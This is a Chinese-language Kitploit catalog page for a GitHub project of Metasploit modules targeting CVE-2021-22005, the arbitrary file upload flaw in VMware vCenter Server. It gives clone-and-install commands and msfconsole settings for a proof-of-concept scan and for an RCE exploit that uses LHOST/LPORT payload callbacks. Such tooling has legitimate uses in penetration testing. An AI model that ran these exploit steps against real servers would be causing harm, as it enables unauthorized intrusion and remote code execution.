Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-22005-metasploit — 关于 CVE-2021-22005 VMware vCenter Server 的 Metasploit 脚本(POC/EXP)包含一个任意文件上传漏洞 | Kitploit
工具/GitHubGitHub/taroballzchen/cve-2021-22005-metasploit
漏洞利用框架漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubtaroballzchen/cve-2021-22005-metasploit

CVE-2021-22005-metasploit

关于 CVE-2021-22005 VMware vCenter Server 的 Metasploit 脚本(POC/EXP)包含一个任意文件上传漏洞

查看仓库
22724年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-22005-metasploit

关于CVE-2021-22005的metasploit脚本(POC/EXP),VMware vCenter Server包含一个任意文件上传漏洞

准备 POC

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp vmware_vcenter_server_file_upload_poc.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_poc.py
msfconsole

POC 使用

root@kitploit:~
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: true for https>
exploit

结果

脚本会上传一个无害的jsp文件,其中包含经过base64编码的文本 "Could be vuln by CVE-2021-22005" poc

准备 EXP

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/exploits/linux/http
cp vmware_vcenter_server_file_upload_to_rce.py ~/.msf4/modules/exploits/linux/http/
chmod +x ~/.msf4/modules/exploits/linux/http/vmware_vcenter_server_file_upload_to_rce.py
msfconsole

漏洞利用使用

root@kitploit:~
set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>
exploit

漏洞利用

exploit

参考

  • https://github.com/5gstudent/CVE-2021-22005-
  • https://github.com/rwincey/CVE-2021-22005
下载工具